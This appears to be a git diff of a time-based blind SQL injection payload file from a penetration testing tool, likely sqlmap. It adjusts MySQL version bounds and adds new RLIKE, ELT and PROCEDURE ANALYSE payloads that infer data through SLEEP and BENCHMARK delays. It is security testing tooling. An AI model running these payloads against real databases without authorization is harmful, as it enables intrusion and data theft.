diff --git a/xml/payloads/05_time_blind.xml b/xml/payloads/05_time_blind.xml index 95a6f5160..e8993f92b 100644 --- a/xml/payloads/05_time_blind.xml +++ b/xml/payloads/05_time_blind.xml @@ -1,9 +1,9 @@ - + - MySQL > 5.0.11 AND time-based blind (SELECT) + MySQL >= 5.0.12 AND time-based blind (SELECT) 5 1 1 @@ -18,12 +18,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 OR time-based blind (SELECT) + MySQL >= 5.0.12 OR time-based blind (SELECT) 5 1 3 @@ -38,12 +38,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 AND time-based blind (SELECT - comment) + MySQL >= 5.0.12 AND time-based blind (SELECT - comment) 5 3 1 @@ -59,12 +59,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 OR time-based blind (SELECT - comment) + MySQL >= 5.0.12 OR time-based blind (SELECT - comment) 5 3 3 @@ -80,12 +80,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 AND time-based blind + MySQL >= 5.0.12 AND time-based blind 5 2 1 @@ -100,12 +100,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 OR time-based blind + MySQL >= 5.0.12 OR time-based blind 5 2 3 @@ -120,12 +120,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 AND time-based blind (comment) + MySQL >= 5.0.12 AND time-based blind (comment) 5 4 1 @@ -141,12 +141,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 OR time-based blind (comment) + MySQL >= 5.0.12 OR time-based blind (comment) 5 4 3 @@ -162,12 +162,12 @@
MySQL - > 5.0.11 + >= 5.0.12
- MySQL < 5.0.12 AND time-based blind (heavy query) + MySQL <= 5.0.11 AND time-based blind (heavy query) 5 2 2 @@ -182,11 +182,12 @@
MySQL + <= 5.0.11
- MySQL < 5.0.12 OR time-based blind (heavy query) + MySQL <= 5.0.11 OR time-based blind (heavy query) 5 2 3 @@ -201,11 +202,12 @@
MySQL + <= 5.0.11
- MySQL < 5.0.12 AND time-based blind (heavy query - comment) + MySQL <= 5.0.11 AND time-based blind (heavy query - comment) 5 5 2 @@ -221,11 +223,12 @@
MySQL + <= 5.0.11
- MySQL < 5.0.12 OR time-based blind (heavy query - comment) + MySQL <= 5.0.11 OR time-based blind (heavy query - comment) 5 5 3 @@ -239,6 +242,168 @@ +
+ MySQL + <= 5.0.11 +
+ + + + MySQL >= 5.0.12 RLIKE time-based blind (SELECT) + 5 + 2 + 1 + 1,2,3 + 1 + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL >= 5.0.12 RLIKE time-based blind (SELECT - comment) + 5 + 4 + 1 + 1,2,3 + 1 + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + # + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL >= 5.0.12 RLIKE time-based blind + 5 + 5 + 1 + 1,2,3 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL >= 5.0.12 RLIKE time-based blind (comment) + 5 + 5 + 1 + 1,2,3 + 1 + RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])) + + RLIKE SLEEP([SLEEPTIME]) + # + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL AND time-based blind (ELT) + 5 + 3 + 1 + 1,2,3 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL OR time-based blind (ELT) + 5 + 3 + 3 + 1,2,3 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + + + + +
+ MySQL +
+ + + + MySQL AND time-based blind (ELT - comment) + 5 + 5 + 1 + 1,2,3 + 1 + AND ELT([INFERENCE],SLEEP([SLEEPTIME])) + + AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + + +
+ MySQL +
+ + + + MySQL OR time-based blind (ELT - comment) + 5 + 5 + 3 + 1,2,3 + 1 + OR ELT([INFERENCE],SLEEP([SLEEPTIME])) + + OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + # + + + +
MySQL
@@ -850,7 +1015,7 @@ - Firebird AND time-based blind (heavy query) + Firebird >= 2.0 AND time-based blind (heavy query) 5 4 2 @@ -870,7 +1035,7 @@ - Firebird OR time-based blind (heavy query) + Firebird >= 2.0 OR time-based blind (heavy query) 5 4 3 @@ -890,7 +1055,7 @@ - Firebird AND time-based blind (heavy query - comment) + Firebird >= 2.0 AND time-based blind (heavy query - comment) 5 5 2 @@ -911,7 +1076,7 @@ - Firebird OR time-based blind (heavy query - comment) + Firebird >= 2.0 OR time-based blind (heavy query - comment) 5 5 3 @@ -1173,12 +1338,12 @@ - + - + - MySQL >= 5.1 heavy-query time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE) + MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE) 5 3 2 @@ -1193,42 +1358,20 @@
MySQL - > 5.0.11 -
- - - - - - MySQL > 5.0.11 time-based blind - Parameter replace (SELECT) - 5 - 4 - 1 - 1,2,3 - 3 - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) - - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) - - - - -
- MySQL - > 5.0.11 + >= 5.0.12
- MySQL > 5.0.11 time-based blind - Parameter replace (SELECT - comment) + MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE) 5 5 - 1 - 1,2,3 - 3 - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + 2 + 1,2,3,4,5 + 1 + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1) - (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1) # @@ -1236,14 +1379,16 @@
MySQL - > 5.0.11 + >= 5.0.12
+ + - MySQL >= 5.0 time-based blind - Parameter replace + MySQL >= 5.0.12 time-based blind - Parameter replace 5 - 3 + 2 1 1,2,3 3 @@ -1256,12 +1401,32 @@
MySQL - >= 5.0 + >= 5.0.12
- MySQL < 5.0 time-based blind - Parameter replace (heavy queries) + MySQL >= 5.0.12 time-based blind - Parameter replace (SELECT) + 5 + 3 + 1 + 1,2,3 + 3 + (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) + + (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR]) + + + + +
+ MySQL + >= 5.0.12 +
+ + + + MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries) 5 4 2 @@ -1276,6 +1441,7 @@
MySQL + <= 5.0.11
@@ -1299,15 +1465,15 @@ - MySQL time-based blind - Parameter replace (MAKE_SET) + MySQL time-based blind - Parameter replace (ELT) 5 5 1 1,2,3 3 - MAKE_SET([INFERENCE],SLEEP([SLEEPTIME])) + ELT([INFERENCE],SLEEP([SLEEPTIME])) - MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) @@ -1318,15 +1484,15 @@ - MySQL time-based blind - Parameter replace (ELT) + MySQL time-based blind - Parameter replace (MAKE_SET) 5 5 1 1,2,3 3 - ELT([INFERENCE],SLEEP([SLEEPTIME])) + MAKE_SET([INFERENCE],SLEEP([SLEEPTIME])) - ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) + MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) @@ -1593,12 +1759,11 @@ > 2.0 - + - - + - MySQL >= 5.0.11 time-based blind - ORDER BY, GROUP BY clause + MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause 5 3 1 @@ -1613,12 +1778,12 @@
MySQL - >= 5.0.11 + >= 5.0.12
- MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query) + MySQL <= 5.0.11 time-based blind - ORDER BY, GROUP BY clause (heavy query) 5 4 2 @@ -1633,6 +1798,7 @@
MySQL + <= 5.0.11
@@ -1815,5 +1981,5 @@ - +